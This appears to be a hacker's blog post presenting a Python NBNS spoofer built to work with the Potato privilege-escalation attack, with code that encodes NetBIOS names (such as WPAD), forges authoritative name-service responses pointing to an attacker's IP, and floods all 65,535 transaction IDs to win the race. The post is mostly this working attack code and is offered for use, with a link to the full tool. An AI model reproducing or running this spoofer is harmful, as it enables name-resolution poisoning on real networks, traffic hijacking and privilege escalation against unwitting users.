So since Potato recently got a update I decided to put this together. Now you don't need to mess with Responder if you don't want to.. altho you should since its badass! The funny part about this is I actually threw it together in about 20min. Something must be working because I'm improving a lot more recently.
Ill give a little explanation but the code is very very readable and I left plenty of comments in there so you can see whats going on.
This is the insane way of encoding the NetBios name.. So if i was to use WPAD as the example it will look like this
'FHFAEBEECACACACACACACACACACACAAA'
And if I was to use DISABLEWPADNOW it would look like this.
'EEEJFDEBECEMEFFHFAEBEEEOEPFHCAAA'
def make_nbname(name):
spoof_name = name.upper()
encoded_name = ''.join([chr((ord(c)>>4) + ord('A'))
+ chr((ord(c)&0xF) + ord('A')) for c in spoof_name])
padding = "CA"*(15-len(spoof_name))
return '\x20' + encoded_name + padding + role[0]
The '\x20' above ^ is the start of a answer reply, and the role is from this... You can use any one of these, I have not tried them all but I really should.
role = {
0:"\x41\x41\x00", # :"Workstation/Redirector" # normal
1:"\x42\x4c\x00", # :"Domain Master Browser"
2:"\x42\x4d\x00", # :"Domain Controller"
3:"\x42\x4e\x00", # :"Local Master Browser"
4:"\x42\x4f\x00", # :"Browser Election"
5:"\x43\x41\x00", # :"File Server"
6:"\x41\x42\x00" # :"Browser"
}
Here is how we make our packet, I ripped most of it from metasploit..
def make_packet(name, return_ip):
pkt = '\x00\x00' # TID better to do it on the fly than call the method over and over
pkt += "\x85\x00" # Flags = response + authoritative + recursion desired
pkt +="\x00\x00" # Questions = 0
pkt +="\x00\x01" # Answer RRs = 1
pkt +="\x00\x00" # Authority RRs = 0
pkt +="\x00\x00" # Additional RRs = 0
pkt += make_nbname(name) # original query name
pkt +="\x00\x20" # Type = NB ...whatever that means
pkt +="\x00\x01" # Class = IN
pkt += struct.pack('>I', sec) # \x00\x00\x00\xff = 4min 15sec
pkt +="\x00\x06" # Datalength = 6
pkt +="\x00\x00" # Flags B-node, unique
pkt += socket.inet_aton(return_ip) # 32bit packed binary, ipv6 uses socket.inet_pton()
return pkt
The one thing to really pay attention to is the struct part, that is how we encode the (Time To Live) its 4 bytes long and represented in seconds so that 60 seconds will be, '\x00\x00\x00\x3c' or say 10Minutes will be 10 * 60 = 600Seconds, and 600 in hex is '0x0258' so it would look like this '\x00\x00\x02\x58' .. anyways none of that should matter just define sec = 60 and your good to go. Its defaulted to 255 fyi which is 4min 15seconds :)
The very last part is how the whole thing works, so whenever your computer makes a NBNS request, there is a 2byte TransactionID associated with it. This I guess was supposed to prevent this very thing from happening, or maybe it was designed as a check I'm not sure. Regardless, since its 2bytes there are only 65,535 possible numbers and we simply loop through all of them. On a modern lan this is not a issue, and turns out to roughly 4.4Mbytes of data.
And there you have it, its actually rather easy. I would recommend using Responder for now but if anyone ever needs it this is how its done :)
The code can be found here https://github.com/trump0dump/netbios
No comments:
Post a Comment